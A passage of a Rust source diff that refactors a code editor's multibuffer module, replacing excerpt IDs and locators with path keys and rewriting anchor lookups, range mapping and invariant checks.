ExcerptId::min()) - .map(|_| Locator::min()), - ); - - let mut cursor = self.excerpt_ids.cursor::(()); - for id in sorted_ids { - if cursor.seek_forward(&id, Bias::Left) { - locators.push(cursor.item().unwrap().locator.clone()); - } else { - panic!("invalid excerpt id {:?}", id); - } - } + pub(crate) fn path_key_index_for_buffer(&self, buffer_id: BufferId) -> Option { + let snapshot = self.buffers.get(&buffer_id)?; + Some(snapshot.path_key_index) + } - locators.sort_unstable(); - locators + fn first_excerpt_for_buffer(&self, buffer_id: BufferId) -> Option<&Excerpt> { + let path_key = &self.buffers.get(&buffer_id)?.path_key; + self.first_excerpt_for_path(path_key) } - pub fn buffer_id_for_excerpt(&self, excerpt_id: ExcerptId) -> Option { - Some(self.excerpt(excerpt_id)?.buffer_id) + fn first_excerpt_for_path(&self, path_key: &PathKey) -> Option<&Excerpt> { + let (_, _, first_excerpt) = + self.excerpts + .find::((), path_key, Bias::Left); + first_excerpt } - pub fn buffer_for_excerpt(&self, excerpt_id: ExcerptId) -> Option<&BufferSnapshot> { - Some(&self.excerpt(excerpt_id)?.buffer) + pub fn buffer_for_id(&self, id: BufferId) -> Option<&BufferSnapshot> { + self.buffers.get(&id).map(|state| &state.buffer_snapshot) } - pub fn range_for_excerpt(&self, excerpt_id: ExcerptId) -> Option> { - let mut cursor = self - .excerpts - .cursor::, ExcerptPoint>>(()); - let locator = self.excerpt_locator_for_id(excerpt_id); - let mut sought_exact = cursor.seek(&Some(locator), Bias::Left); - if cursor.item().is_none() && excerpt_id == ExcerptId::max() { - sought_exact = true; - cursor.prev(); - } else if excerpt_id == ExcerptId::min() { - sought_exact = true; - } - if sought_exact { - let start = cursor.start().1; - let end = cursor.end().1; - let mut diff_transforms = self - .diff_transforms - .cursor::>>(()); - diff_transforms.seek(&start, Bias::Left); - let overshoot = start - diff_transforms.start().0; - let start = diff_transforms.start().1 + overshoot; - diff_transforms.seek(&end, Bias::Right); - let overshoot = end - diff_transforms.start().0; - let end = diff_transforms.start().1 + overshoot; - Some(start.0..end.0) - } else { - None - } + fn try_path_for_anchor(&self, anchor: ExcerptAnchor) -> Option { + self.path_keys_by_index.get(&anchor.path).cloned() } - /// Returns the excerpt for the given id. The returned excerpt is guaranteed - /// to have the latest excerpt id for the one passed in and will also remap - /// `ExcerptId::max()` to the corresponding excertp ID. - /// - /// Callers of this function should generally use the resulting excerpt's `id` field - /// afterwards. - fn excerpt(&self, excerpt_id: ExcerptId) -> Option<&Excerpt> { - let excerpt_id = self.latest_excerpt_id(excerpt_id); - let locator = self.try_excerpt_locator_for_id(excerpt_id)?; - let (_, _, item) = - self.excerpts - .find::, _>((), &Some(locator), Bias::Left); - if let Some(excerpt) = item - && excerpt.id == excerpt_id - { - return Some(excerpt); - } else if item.is_none() && excerpt_id == ExcerptId::max() { - return self.excerpts.last(); - } - None + pub fn path_for_anchor(&self, anchor: ExcerptAnchor) -> PathKey { + self.try_path_for_anchor(anchor) + .expect("invalid anchor: path was never added to multibuffer") } /// Returns the excerpt containing range and its offset start within the multibuffer or none if `range` spans multiple excerpts pub fn excerpt_containing( &self, range: Range, - ) -> Option> { + ) -> Option<(&BufferSnapshot, ExcerptRange)> { let range = range.start.to_offset(self)..range.end.to_offset(self); let mut cursor = self.cursor::(); cursor.seek(&range.start); @@ -7066,31 +6394,15 @@ impl MultiBufferSnapshot { let start_excerpt = cursor.excerpt()?; if range.end != range.start { cursor.seek_forward(&range.end); - if cursor.excerpt()?.id != start_excerpt.id { + if cursor.excerpt()? != start_excerpt { return None; } } - cursor.seek_to_start_of_current_excerpt(); - let region = cursor.region()?; - let offset = region.range.start; - let buffer_offset = start_excerpt.buffer_start_offset(); - let excerpt_offset = *cursor.excerpts.start(); - Some(MultiBufferExcerpt { - diff_transforms: cursor.diff_transforms, - excerpt: start_excerpt, - offset, - buffer_offset, - excerpt_offset, - }) - } - - pub fn buffer_id_for_anchor(&self, anchor: Anchor) -> Option { - if let Some(id) = anchor.text_anchor.buffer_id { - return Some(id); - } - let excerpt = self.excerpt_containing(anchor..anchor)?; - Some(excerpt.buffer_id()) + Some(( + start_excerpt.buffer_snapshot(self), + start_excerpt.range.clone(), + )) } pub fn selections_in_range<'a>( @@ -7099,27 +6411,34 @@ impl MultiBufferSnapshot { include_local: bool, ) -> impl 'a + Iterator)> { let mut cursor = self.excerpts.cursor::(()); - let start_locator = self.excerpt_locator_for_id(range.start.excerpt_id); - let end_locator = self.excerpt_locator_for_id(range.end.excerpt_id); - cursor.seek(start_locator, Bias::Left); + cursor.seek(&range.start.seek_target(self), Bias::Left); cursor - .take_while(move |excerpt| excerpt.locator <= *end_locator) + .take_while(move |excerpt| { + let excerpt_start = + Anchor::in_buffer(excerpt.path_key_index, excerpt.range.context.start); + excerpt_start.cmp(&range.end, self).is_le() + }) .flat_map(move |excerpt| { + let buffer_snapshot = excerpt.buffer_snapshot(self); let mut query_range = excerpt.range.context.start..excerpt.range.context.end; - if excerpt.id == range.start.excerpt_id { - query_range.start = range.start.text_anchor; + if let Some(excerpt_anchor) = range.start.excerpt_anchor() + && excerpt.contains(&excerpt_anchor, self) + { + query_range.start = excerpt_anchor.text_anchor(); } - if excerpt.id == range.end.excerpt_id { - query_range.end = range.end.text_anchor; + if let Some(excerpt_anchor) = range.end.excerpt_anchor() + && excerpt.contains(&excerpt_anchor, self) + { + query_range.end = excerpt_anchor.text_anchor(); } - excerpt - .buffer + buffer_snapshot .selections_in_range(query_range, include_local) .flat_map(move |(replica_id, line_mode, cursor_shape, selections)| { selections.map(move |selection| { - let mut start = Anchor::in_buffer(excerpt.id, selection.start); - let mut end = Anchor::in_buffer(excerpt.id, selection.end); + let mut start = + Anchor::in_buffer(excerpt.path_key_index, selection.start); + let mut end = Anchor::in_buffer(excerpt.path_key_index, selection.end); if range.start.cmp(&start, self).is_gt() { start = range.start; } @@ -7149,7 +6468,16 @@ impl MultiBufferSnapshot { } pub fn diff_for_buffer_id(&self, buffer_id: BufferId) -> Option<&BufferDiffSnapshot> { - self.diffs.get(&buffer_id).map(|diff| &diff.diff) + self.diff_state(buffer_id).map(|diff| &diff.diff) + } + + fn diff_state(&self, buffer_id: BufferId) -> Option<&DiffStateSnapshot> { + find_diff_state(&self.diffs, buffer_id) + } + + pub fn total_changed_lines(&self) -> (u32, u32) { + let summary = self.diffs.summary(); + (summary.added_rows, summary.removed_rows) } pub fn all_diff_hunks_expanded(&self) -> bool { @@ -7183,10 +6511,11 @@ impl MultiBufferSnapshot { .to_multi_buffer_debug_ranges(self) .into_iter() .flat_map(|range| { - self.range_to_buffer_ranges(range.start..=range.end) + self.range_to_buffer_ranges(range) .into_iter() - .map(|(buffer, range, _excerpt_id)| { - buffer.anchor_after(range.start)..buffer.anchor_before(range.end) + .map(|(buffer_snapshot, range, _)| { + buffer_snapshot.anchor_after(range.start) + ..buffer_snapshot.anchor_before(range.end) }) }) .collect(); @@ -7197,42 +6526,218 @@ impl MultiBufferSnapshot { fn excerpt_edits_for_diff_change( &self, - buffer_state: &BufferState, + path: &PathKey, diff_change_range: Range, ) -> Vec>> { let mut excerpt_edits = Vec::new(); - for locator in &buffer_state.excerpts { - let mut cursor = self - .excerpts - .cursor::, ExcerptOffset>>(()); - cursor.seek_forward(&Some(locator), Bias::Left); - if let Some(excerpt) = cursor.item() - && excerpt.locator == *locator + let mut cursor = self.excerpts.cursor::(()); + cursor.seek(path, Bias::Left); + while let Some(excerpt) = cursor.item() + && &excerpt.path_key == path + { + let buffer_snapshot = excerpt.buffer_snapshot(self); + let excerpt_buffer_range = excerpt.range.context.to_offset(buffer_snapshot); + let excerpt_start = cursor.start().clone(); + let excerpt_len = excerpt.text_summary.len; + cursor.next(); + if diff_change_range.end < excerpt_buffer_range.start + || diff_change_range.start > excerpt_buffer_range.end { - let excerpt_buffer_range = excerpt.range.context.to_offset(&excerpt.buffer); - if diff_change_range.end < excerpt_buffer_range.start - || diff_change_range.start > excerpt_buffer_range.end - { - continue; - } - let excerpt_start = cursor.start().1; - let excerpt_len = excerpt.text_summary.len; - let diff_change_start_in_excerpt = diff_change_range - .start - .saturating_sub(excerpt_buffer_range.start); - let diff_change_end_in_excerpt = diff_change_range - .end - .saturating_sub(excerpt_buffer_range.start); - let edit_start = excerpt_start + diff_change_start_in_excerpt.min(excerpt_len); - let edit_end = excerpt_start + diff_change_end_in_excerpt.min(excerpt_len); - excerpt_edits.push(Edit { - old: edit_start..edit_end, - new: edit_start..edit_end, - }); + continue; } + let diff_change_start_in_excerpt = diff_change_range + .start + .saturating_sub(excerpt_buffer_range.start); + let diff_change_end_in_excerpt = diff_change_range + .end + .saturating_sub(excerpt_buffer_range.start); + let edit_start = excerpt_start.len() + diff_change_start_in_excerpt.min(excerpt_len); + let edit_end = excerpt_start.len() + diff_change_end_in_excerpt.min(excerpt_len); + excerpt_edits.push(Edit { + old: edit_start..edit_end, + new: edit_start..edit_end, + }); } excerpt_edits } + + fn excerpts_for_path<'a>( + &'a self, + path_key: &'a PathKey, + ) -> impl Iterator> + 'a { + let mut cursor = self.excerpts.cursor::(()); + cursor.seek(path_key, Bias::Left); + cursor + .take_while(move |item| &item.path_key == path_key) + .map(|excerpt| excerpt.range.clone()) + } + + /// If the given multibuffer range is contained in a single excerpt and contains no deleted hunks, + /// returns the corresponding buffer range. + /// + /// Otherwise, returns None. + pub fn range_to_buffer_range( + &self, + range: Range, + ) -> Option<(&BufferSnapshot, Range)> + where + MBD: MultiBufferDimension + Ord + Sub + ops::AddAssign<::Output>, + MBD::TextDimension: AddAssign<::Output>, + { + let mut cursor = self.cursor::(); + cursor.seek(&range.start); + + let start_region = cursor.region()?.clone(); + + while let Some(region) = cursor.region() + && region.range.end < range.end + { + if !region.is_main_buffer { + return None; + } + cursor.next(); + } + + let end_region = cursor.region()?; + if end_region.buffer.remote_id() != start_region.buffer.remote_id() { + return None; + } + + let mut buffer_start = start_region.buffer_range.start; + buffer_start += range.start - start_region.range.start; + let mut buffer_end = end_region.buffer_range.start; + buffer_end += range.end - end_region.range.start; + + Some((start_region.buffer, buffer_start..buffer_end)) + } + + /// If the two endpoints of the range lie in the same excerpt, return the corresponding + /// buffer range. Intervening deleted hunks are allowed. + pub fn anchor_range_to_buffer_anchor_range( + &self, + range: Range, + ) -> Option<(&BufferSnapshot, Range)> { + let mut cursor = self.excerpts.cursor::(()); + cursor.seek(&range.start.seek_target(&self), Bias::Left); + + let start_excerpt = cursor.item()?; + + let snapshot = start_excerpt.buffer_snapshot(&self); + + cursor.seek(&range.end.seek_target(&self), Bias::Left); + + let end_excerpt = cursor.item()?; + + if start_excerpt != end_excerpt { + return None; + } + + if let Anchor::Excerpt(excerpt_anchor) = range.start + && (excerpt_anchor.path != start_excerpt.path_key_index + || excerpt_anchor.buffer_id() != snapshot.remote_id()) + { + return None; + } + if let Anchor::Excerpt(excerpt_anchor) = range.end + && (excerpt_anchor.path != end_excerpt.path_key_index + || excerpt_anchor.buffer_id() != snapshot.remote_id()) + { + return None; + } + + Some(( + snapshot, + range.start.text_anchor_in(snapshot)..range.end.text_anchor_in(snapshot), + )) + } + + /// Returns all nonempty intersections of the given buffer range with excerpts in the multibuffer in order. + /// + /// The multibuffer ranges are split to not intersect deleted hunks. + pub fn buffer_range_to_excerpt_ranges( + &self, + range: Range, + ) -> impl Iterator> { + assert!(range.start.buffer_id == range.end.buffer_id); + + let buffer_id = range.start.buffer_id; + self.buffers + .get(&buffer_id) + .map(|buffer_state_snapshot| { + let path_key_index = buffer_state_snapshot.path_key_index; + let buffer_snapshot = &buffer_state_snapshot.buffer_snapshot; + let buffer_range = range.to_offset(buffer_snapshot); + + let start = Anchor::in_buffer(path_key_index, range.start).to_offset(self); + let mut cursor = self.cursor::(); + cursor.seek(&start); + std::iter::from_fn(move || { + while let Some(region) = cursor.region() + && !region.is_main_buffer + { + cursor.next(); + } + + let region = cursor.region()?; + if region.buffer.remote_id() != buffer_id + || region.buffer_range.start > BufferOffset(buffer_range.end) + { + return None; + } + + let start = region + .buffer_range + .start + .max(BufferOffset(buffer_range.start)); + let mut end = region.buffer_range.end.min(BufferOffset(buffer_range.end)); + + cursor.next(); + while let Some(region) = cursor.region() + && region.is_main_buffer + && region.buffer.remote_id() == buffer_id + && region.buffer_range.start <= end + { + end = end + .max(region.buffer_range.end) + .min(BufferOffset(buffer_range.end)); + cursor.next(); + } + + let multibuffer_range = Anchor::range_in_buffer( + path_key_index, + buffer_snapshot.anchor_range_inside(start..end), + ); + Some(multibuffer_range) + }) + }) + .into_iter() + .flatten() + } + + pub fn buffers_with_paths<'a>( + &'a self, + ) -> impl 'a + Iterator { + self.buffers + .values() + .map(|buffer| (&buffer.buffer_snapshot, &buffer.path_key)) + } + + /// Returns the number of graphemes in `range`. + /// + /// This counts user-visible characters like `e\u{301}` as one. + pub fn grapheme_count_for_range(&self, range: &Range) -> usize { + self.text_for_range(range.clone()) + .collect::() + .graphemes(true) + .count() + } + + pub fn range_for_buffer(&self, buffer_id: BufferId) -> Option> { + let path_key = self.path_key_index_for_buffer(buffer_id)?; + let start = Anchor::in_buffer(path_key, text::Anchor::min_for_buffer(buffer_id)); + let end = Anchor::in_buffer(path_key, text::Anchor::max_for_buffer(buffer_id)); + Some((start..end).to_point(self)) + } } #[cfg(any(test, feature = "test-support"))] @@ -7250,27 +6755,74 @@ impl MultiBufferSnapshot { #[cfg(any(test, feature = "test-support"))] fn check_invariants(&self) { let excerpts = self.excerpts.items(()); - let excerpt_ids = self.excerpt_ids.items(()); + + let mut all_buffer_path_keys = HashSet::default(); + for buffer in self.buffers.values() { + let path_key = buffer.path_key.clone(); + assert!( + all_buffer_path_keys.insert(path_key), + "path key reused for multiple buffers: {:#?}", + self.buffers + ); + } + + let all_excerpt_path_keys = HashSet::from_iter(excerpts.iter().map(|e| e.path_key.clone())); for (ix, excerpt) in excerpts.iter().enumerate() { - if ix == 0 { - if excerpt.locator <= Locator::min() { - panic!("invalid first excerpt locator {:?}", excerpt.locator); + if ix > 0 { + let prev = &excerpts[ix - 1]; + + if excerpt.path_key < prev.path_key { + panic!("excerpt path_keys are out-of-order: {:#?}", excerpts); + } else if excerpt.path_key == prev.path_key { + assert_eq!( + excerpt.buffer_id, prev.buffer_id, + "excerpts with same path_key have different buffer_ids: {:#?}", + excerpts + ); + if excerpt + .start_anchor() + .cmp(&prev.end_anchor(), &self) + .is_le() + { + panic!("excerpt anchors are out-of-order: {:#?}", excerpts); + } + if excerpt + .start_anchor() + .cmp(&excerpt.end_anchor(), &self) + .is_ge() + { + panic!("excerpt with backward range: {:#?}", excerpts); + } } - } else if excerpt.locator <= excerpts[ix - 1].locator { - panic!("excerpts are out-of-order: {:?}", excerpts); } - } - for (ix, entry) in excerpt_ids.iter().enumerate() { - if ix == 0 { - if entry.id.cmp(&ExcerptId::min(), self).is_le() { - panic!("invalid first excerpt id {:?}", entry.id); - } - } else if entry.id <= excerpt_ids[ix - 1].id { - panic!("excerpt ids are out-of-order: {:?}", excerpt_ids); + if ix < excerpts.len() - 1 { + assert!( + excerpt.has_trailing_newline, + "non-trailing excerpt has no trailing newline: {:#?}", + excerpts + ); + } else { + assert!( + !excerpt.has_trailing_newline, + "trailing excerpt has trailing newline: {:#?}", + excerpts + ); } + assert!( + all_buffer_path_keys.contains(&excerpt.path_key), + "excerpt path key not found in active path keys: {:#?}", + excerpt.path_key + ); + assert_eq!( + self.path_keys_by_index.get(&excerpt.path_key_index), + Some(&excerpt.path_key), + "excerpt path key index does not match path key: {:#?}", + excerpt.path_key, + ); } + assert_eq!(all_buffer_path_keys, all_excerpt_path_keys); if self.diff_transforms.summary().input != self.excerpts.summary().text { panic!( @@ -7418,7 +6970,7 @@ where && self .excerpts .item() - .is_some_and(|excerpt| excerpt.id != hunk_info.excerpt_id) + .is_some_and(|excerpt| excerpt.end_anchor() != hunk_info.excerpt_end) { self.excerpts.next(); } @@ -7484,13 +7036,13 @@ where DiffTransform::DeletedHunk { hunk_info, .. } => self .excerpts .item() - .is_some_and(|excerpt| excerpt.id != hunk_info.excerpt_id), + .is_some_and(|excerpt| excerpt.end_anchor() != hunk_info.excerpt_end), }) } fn main_buffer_position(&self) -> Option { let excerpt = self.excerpts.item()?; - let buffer = &excerpt.buffer; + let buffer = excerpt.buffer_snapshot(self.snapshot); let buffer_context_start = excerpt.range.context.start.summary::(buffer); let mut buffer_start = buffer_context_start; let overshoot = self.diff_transforms.end().excerpt_dimension - *self.excerpts.start(); @@ -7498,6 +7050,19 @@ where Some(buffer_start) } + fn buffer_position_at(&self, output_position: &MBD) -> Option { + let excerpt = self.excerpts.item()?; + let buffer = excerpt.buffer_snapshot(self.snapshot); + let buffer_context_start = excerpt.range.context.start.summary::(buffer); + let mut excerpt_offset = self.diff_transforms.start().excerpt_dimension; + if let Some(DiffTransform::BufferContent { .. }) = self.diff_transforms.item() { + excerpt_offset += *output_position - self.diff_transforms.start().output_dimension.0; + } + let mut result = buffer_context_start; + result += excerpt_offset - *self.excerpts.start(); + Some(result) + } + fn build_region(&self) -> Option> { let excerpt = self.excerpts.item()?; match self.diff_transforms.item()? { @@ -7508,7 +7073,7 @@ where hunk_info, .. } => { - let diff = self.diffs.get(buffer_id)?; + let diff = find_diff_state(&self.snapshot.diffs, *buffer_id)?; let buffer = diff.base_text(); let mut rope_cursor = buffer.as_rope().cursor(0); let buffer_start = rope_cursor.summary::(base_text_byte_range.start); @@ -7532,7 +7097,7 @@ where DiffTransform::BufferContent { inserted_hunk_info, .. } => { - let buffer = &excerpt.buffer; + let buffer = excerpt.buffer_snapshot(self.snapshot); let buffer_context_start = excerpt.range.context.start.summary::(buffer); let mut start = self.diff_transforms.start().output_dimension.0; @@ -7626,28 +7191,47 @@ where impl Excerpt { fn new( - id: ExcerptId, - locator: Locator, - buffer_id: BufferId, - buffer: Arc, + path_key: PathKey, + path_key_index: PathKeyIndex, + buffer_snapshot: &BufferSnapshot, range: ExcerptRange, has_trailing_newline: bool, ) -> Self { Excerpt { - id, - locator, - max_buffer_row: range.context.end.to_point(&buffer).row, - text_summary: buffer - .text_summary_for_range::(range.context.to_offset(&buffer)), - buffer_id, - buffer, + path_key, + path_key_index, + buffer_id: buffer_snapshot.remote_id(), + max_buffer_row: range.context.end.to_point(&buffer_snapshot).row, + text_summary: buffer_snapshot.text_summary_for_range::( + range.context.to_offset(&buffer_snapshot), + ), range, has_trailing_newline, } } - fn chunks_in_range(&self, range: Range, language_aware: bool) -> ExcerptChunks<'_> { - let content_start = self.range.context.start.to_offset(&self.buffer); + fn buffer_snapshot<'a>(&self, snapshot: &'a MultiBufferSnapshot) -> &'a BufferSnapshot { + &snapshot + .buffers + .get(&self.buffer_id) + .expect("buffer snapshot not found for excerpt") + .buffer_snapshot + } + + fn buffer(&self, multibuffer: &MultiBuffer) -> Entity { + multibuffer + .buffer(self.buffer_id) + .expect("buffer entity not found for excerpt") + } + + fn chunks_in_range<'a>( + &'a self, + range: Range, + language_aware: bool, + snapshot: &'a MultiBufferSnapshot, + ) -> ExcerptChunks<'a> { + let buffer = self.buffer_snapshot(snapshot); + let content_start = self.range.context.start.to_offset(buffer); let chunks_start = content_start + range.start; let chunks_end = content_start + cmp::min(range.end, self.text_summary.len); @@ -7655,17 +7239,23 @@ impl Excerpt { && range.start <= self.text_summary.len && range.end > self.text_summary.len; - let content_chunks = self.buffer.chunks(chunks_start..chunks_end, language_aware); + let content_chunks = buffer.chunks(chunks_start..chunks_end, language_aware); ExcerptChunks { - excerpt_id: self.id, content_chunks, has_footer, + end: self.end_anchor(), } } - fn seek_chunks(&self, excerpt_chunks: &mut ExcerptChunks, range: Range) { - let content_start = self.range.context.start.to_offset(&self.buffer); + fn seek_chunks( + &self, + excerpt_chunks: &mut ExcerptChunks, + range: Range, + snapshot: &MultiBufferSnapshot, + ) { + let buffer = self.buffer_snapshot(snapshot); + let content_start = self.range.context.start.to_offset(buffer); let chunks_start = content_start + range.start; let chunks_end = content_start + cmp::min(range.end, self.text_summary.len); excerpt_chunks.content_chunks.seek(chunks_start..chunks_end); @@ -7674,218 +7264,43 @@ impl Excerpt { && range.end > self.text_summary.len; } - fn clip_anchor(&self, text_anchor: text::Anchor) -> text::Anchor { - if text_anchor - .cmp(&self.range.context.start, &self.buffer) - .is_lt() - { + fn clip_anchor( + &self, + text_anchor: text::Anchor, + snapshot: &MultiBufferSnapshot, + ) -> text::Anchor { + let buffer = self.buffer_snapshot(snapshot); + if text_anchor.cmp(&self.range.context.start, buffer).is_lt() { self.range.context.start - } else if text_anchor - .cmp(&self.range.context.end, &self.buffer) - .is_gt() - { + } else if text_anchor.cmp(&self.range.context.end, buffer).is_gt() { self.range.context.end } else { text_anchor } } - fn contains(&self, anchor: &Anchor) -> bool { - (anchor.text_anchor.buffer_id == None - || anchor.text_anchor.buffer_id == Some(self.buffer_id)) + pub(crate) fn contains(&self, anchor: &ExcerptAnchor, snapshot: &MultiBufferSnapshot) -> bool { + self.path_key_index == anchor.path + && self.buffer_id == anchor.text_anchor.buffer_id && self .range - .context - .start - .cmp(&anchor.text_anchor, &self.buffer) - .is_le() - && self - .range - .context - .end - .cmp(&anchor.text_anchor, &self.buffer) - .is_ge() - } - - /// The [`Excerpt`]'s start offset in its [`Buffer`] - fn buffer_start_offset(&self) -> BufferOffset { - BufferOffset(self.range.context.start.to_offset(&self.buffer)) - } - - /// The [`Excerpt`]'s end offset in its [`Buffer`] - fn buffer_end_offset(&self) -> BufferOffset { - self.buffer_start_offset() + self.text_summary.len - } -} - -impl<'a> MultiBufferExcerpt<'a> { - pub fn id(&self) -> ExcerptId { - self.excerpt.id - } - - pub fn buffer_id(&self) -> BufferId { - self.excerpt.buffer_id - } - - pub fn start_anchor(&self) -> Anchor { - Anchor::in_buffer(self.excerpt.id, self.excerpt.range.context.start) - } - - pub fn end_anchor(&self) -> Anchor { - Anchor::in_buffer(self.excerpt.id, self.excerpt.range.context.end) + .contains(&anchor.text_anchor(), self.buffer_snapshot(snapshot)) } - pub fn buffer(&self) -> &'a BufferSnapshot { - &self.excerpt.buffer + fn start_anchor(&self) -> ExcerptAnchor { + ExcerptAnchor::in_buffer(self.path_key_index, self.range.context.start) } - pub fn buffer_range(&self) -> Range { - self.buffer_offset - ..BufferOffset( - self.excerpt - .range - .context - .end - .to_offset(&self.excerpt.buffer.text), - ) - } - - pub fn start_offset(&self) -> MultiBufferOffset { - self.offset - } - - /// Maps an offset within the [`MultiBuffer`] to an offset within the [`Buffer`] - pub fn map_offset_to_buffer(&mut self, offset: MultiBufferOffset) -> BufferOffset { - self.map_range_to_buffer(offset..offset).start - } - - /// Maps a range within the [`MultiBuffer`] to a range within the [`Buffer`] - pub fn map_range_to_buffer(&mut self, range: Range) -> Range { - self.diff_transforms - .seek(&OutputDimension(range.start), Bias::Right); - let start = self.map_offset_to_buffer_internal(range.start); - let end = if range.end > range.start { - self.diff_transforms - .seek_forward(&OutputDimension(range.end), Bias::Right); - self.map_offset_to_buffer_internal(range.end) - } else { - start - }; - start..end - } - - fn map_offset_to_buffer_internal(&self, offset: MultiBufferOffset) -> BufferOffset { - let mut excerpt_offset = self.diff_transforms.start().excerpt_dimension; - if let Some(DiffTransform::BufferContent { .. }) = self.diff_transforms.item() { - excerpt_offset += offset - self.diff_transforms.start().output_dimension.0; - }; - let offset_in_excerpt = excerpt_offset.saturating_sub(self.excerpt_offset); - self.buffer_offset + offset_in_excerpt - } - - /// Map an offset within the [`Buffer`] to an offset within the [`MultiBuffer`] - pub fn map_offset_from_buffer(&mut self, buffer_offset: BufferOffset) -> MultiBufferOffset { - self.map_range_from_buffer(buffer_offset..buffer_offset) - .start - } - - /// Map a range within the [`Buffer`] to a range within the [`MultiBuffer`] - pub fn map_range_from_buffer( - &mut self, - buffer_range: Range, - ) -> Range { - if buffer_range.start < self.buffer_offset { - log::warn!( - "Attempting to map a range from a buffer offset that starts before the current buffer offset" - ); - return self.offset..self.offset; - } - let overshoot = buffer_range.start - self.buffer_offset; - let excerpt_offset = self.excerpt_offset + overshoot; - let excerpt_seek_dim = excerpt_offset; - self.diff_transforms.seek(&excerpt_seek_dim, Bias::Right); - if self.diff_transforms.start().excerpt_dimension > excerpt_offset { - log::warn!( - "Attempting to map a range from a buffer offset that starts before the current buffer offset" - ); - return self.offset..self.offset; - } - let overshoot = excerpt_offset - self.diff_transforms.start().excerpt_dimension; - let start = self.diff_transforms.start().output_dimension.0 + overshoot; - - let end = if buffer_range.start < buffer_range.end { - let overshoot = buffer_range.end - self.buffer_offset; - let excerpt_offset = self.excerpt_offset + overshoot; - let excerpt_seek_dim = excerpt_offset; - self.diff_transforms - .seek_forward(&excerpt_seek_dim, Bias::Right); - let overshoot = excerpt_offset - self.diff_transforms.start().excerpt_dimension; - // todo(lw): Clamp end to the excerpt boundaries - self.diff_transforms.start().output_dimension.0 + overshoot - } else { - start - }; - - start..end - } - - /// Returns true if the entirety of the given range is in the buffer's excerpt - pub fn contains_buffer_range(&self, range: Range) -> bool { - range.start >= self.excerpt.buffer_start_offset() - && range.end <= self.excerpt.buffer_end_offset() - } - - /// Returns true if any part of the given range is in the buffer's excerpt - pub fn contains_partial_buffer_range(&self, range: Range) -> bool { - range.start <= self.excerpt.buffer_end_offset() - && range.end >= self.excerpt.buffer_start_offset() - } - - pub fn max_buffer_row(&self) -> u32 { - self.excerpt.max_buffer_row - } -} - -impl ExcerptId { - pub fn min() -> Self { - Self(0) - } - - pub fn max() -> Self { - Self(u32::MAX) - } - - pub fn to_proto(self) -> u64 { - self.0 as _ - } - - pub fn from_proto(proto: u64) -> Self { - Self(proto as _) - } - - pub fn cmp(&self, other: &Self, snapshot: &MultiBufferSnapshot) -> cmp::Ordering { - let a = snapshot.excerpt_locator_for_id(*self); - let b = snapshot.excerpt_locator_for_id(*other); - a.cmp(b).then_with(|| self.0.cmp(&other.0)) - } -} - -impl From for usize { - fn from(val: ExcerptId) -> Self { - val.0 as usize + fn end_anchor(&self) -> ExcerptAnchor { + ExcerptAnchor::in_buffer(self.path_key_index, self.range.context.end) } } -impl fmt::Debug for Excerpt { - fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { - f.debug_struct("Excerpt") - .field("id", &self.id) - .field("locator", &self.locator) - .field("buffer_id", &self.buffer_id) - .field("range", &self.range) - .field("text_summary", &self.text_summary) - .field("has_trailing_newline", &self.has_trailing_newline) - .finish() +impl PartialEq for Excerpt { + fn eq(&self, other: &Self) -> bool { + self.path_key_index == other.path_key_index + && self.buffer_id == other.buffer_id + && self.range.context == other.range.context } } @@ -7898,8 +7313,8 @@ impl sum_tree::Item for Excerpt { text += TextSummary::from("\n"); } ExcerptSummary { - excerpt_id: self.id, - excerpt_locator: self.locator.clone(), + path_key: self.path_key.clone(), + max_anchor: Some(self.range.context.end), widest_line_number: self.max_buffer_row, text: text.into(), count: 1, @@ -7907,22 +7322,6 @@ impl sum_tree::Item for Excerpt { } } -impl sum_tree::Item for ExcerptIdMapping { - type Summary = ExcerptId; - - fn summary(&self, _cx: ()) -> Self::Summary { - self.id - } -} - -impl sum_tree::KeyedItem for ExcerptIdMapping { - type Key = ExcerptId; - - fn key(&self) -> Self::Key { - self.id - } -} - impl DiffTransform { fn hunk_info(&self) -> Option { match self { @@ -7971,45 +7370,98 @@ impl sum_tree::ContextLessSummary for DiffTransformSummary { } } -impl sum_tree::ContextLessSummary for ExcerptId { - fn zero() -> Self { - Self(0) +impl sum_tree::Dimension<'_, ExcerptSummary> for PathKey { + fn zero(_: ::Context<'_>) -> Self { + PathKey::min() } - fn add_summary(&mut self, summary: &Self) { - *self = cmp::max(*self, *summary); + fn add_summary( + &mut self, + summary: &'_ ExcerptSummary, + _cx: ::Context<'_>, + ) { + *self = summary.path_key.clone(); + } +} + +impl sum_tree::Dimension<'_, ExcerptSummary> for MultiBufferOffset { + fn zero(_: ::Context<'_>) -> Self { + MultiBufferOffset::ZERO + } + + fn add_summary( + &mut self, + summary: &'_ ExcerptSummary, + _cx: ::Context<'_>, + ) { + *self += summary.text.len } } impl sum_tree::ContextLessSummary for ExcerptSummary { fn zero() -> Self { - Self::default() + Self::min() } fn add_summary(&mut self, summary: &Self) { debug_assert!( - summary.excerpt_locator > self.excerpt_locator - || self.excerpt_locator == Locator::min(), - "Excerpt locators must be in ascending order: {:?} > {:?}", - summary.excerpt_locator, - self.excerpt_locator + summary.path_key >= self.path_key, + "Path keys must be in ascending order: {:?} > {:?}", + summary.path_key, + self.path_key ); - self.excerpt_locator = summary.excerpt_locator.clone(); + + self.path_key = summary.path_key.clone(); + self.max_anchor = summary.max_anchor; self.text += summary.text; self.widest_line_number = cmp::max(self.widest_line_number, summary.widest_line_number); self.count += summary.count; } } -impl<'a> sum_tree::SeekTarget<'a, ExcerptSummary, Option<&'a Locator>> for Locator { - fn cmp(&self, cursor_location: &Option<&'a Locator>, _: ()) -> cmp::Ordering { - Ord::cmp(&Some(self), cursor_location) +impl sum_tree::SeekTarget<'_, ExcerptSummary, ExcerptSummary> for AnchorSeekTarget { + fn cmp( + &self, + cursor_location: &ExcerptSummary, + _cx: ::Context<'_>, + ) -> cmp::Ordering { + match self { + AnchorSeekTarget::Excerpt { + path_key, + anchor, + snapshot, + } => { + let path_comparison = Ord::cmp(path_key, &cursor_location.path_key); + if path_comparison.is_ne() { + path_comparison + } else if let Some(snapshot) = snapshot { + if anchor.text_anchor.buffer_id != snapshot.remote_id() { + Ordering::Greater + } else if let Some(max_anchor) = cursor_location.max_anchor { + debug_assert_eq!(max_anchor.buffer_id, snapshot.remote_id()); + anchor.text_anchor().cmp(&max_anchor, snapshot) + } else { + Ordering::Greater + } + } else { + // shouldn't happen because we expect this buffer not to have any excerpts + // (otherwise snapshot would have been Some) + Ordering::Equal 